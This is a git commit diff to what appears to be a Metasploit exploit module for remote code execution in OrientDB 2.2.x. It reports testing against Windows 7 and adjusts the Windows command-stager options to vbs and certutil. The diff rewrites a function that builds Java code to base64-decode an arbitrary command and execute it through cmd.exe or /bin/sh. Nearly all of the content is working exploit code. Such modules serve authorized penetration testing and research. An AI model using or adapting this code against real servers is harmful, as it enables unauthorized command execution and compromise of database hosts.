Orientdb 2.2.x RCE - Changed the java_craft_runtime_exec function; Tested the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success

Ricardo Almeida · Ricardo Almeida · commit f3f96babb9e4 · 2017-07-19T10:46:10.000+01:00
diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb
@@ -34,8 +34,7 @@ def initialize(info = {})
         [
           ['Linux',    {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
           ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
-          # WARNING: Not tested against Windows
-          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['debug_asm','debug_write','vbs','certutil']}]
+          ['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
         ],
       'DisclosureDate' => 'Jul 13 2017',
       'DefaultTarget'  => 0))
@@ -132,18 +131,18 @@ def java_craft_runtime_exec(cmd)
     decoder = Rex::Text.rand_text_alpha(5, 8)
     decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
     cmd_array = Rex::Text.rand_text_alpha(5, 8)
-    jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\\n"
-    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\\\"#{Rex::Text.encode_base64(cmd)}\\\");\\n"
-    jcode << "String [] #{cmd_array} = new String[3];\\n"
+    jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
+    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+    jcode << "String [] #{cmd_array} = new String[3];\n"
     if target['Platform'] == 'win'
-      jcode << "#{cmd_array}[0] = \\\"cmd.exe\\\";\\n"
-      jcode << "#{cmd_array}[1] = \\\"/c\\\";\\n"
+      jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
+      jcode << "#{cmd_array}[1] = \"/c\";\n"
     else
-      jcode << "#{cmd_array}[0] = \\\"/bin/sh\\\";\\n"
-      jcode << "#{cmd_array}[1] = \\\"-c\\\";\\n"
+      jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
+      jcode << "#{cmd_array}[1] = \"-c\";\n"
     end
-    jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \\\"UTF-8\\\");\\n"
-    jcode << "Runtime.getRuntime().exec(#{cmd_array});"
+    jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
+    jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
     jcode
   end
 
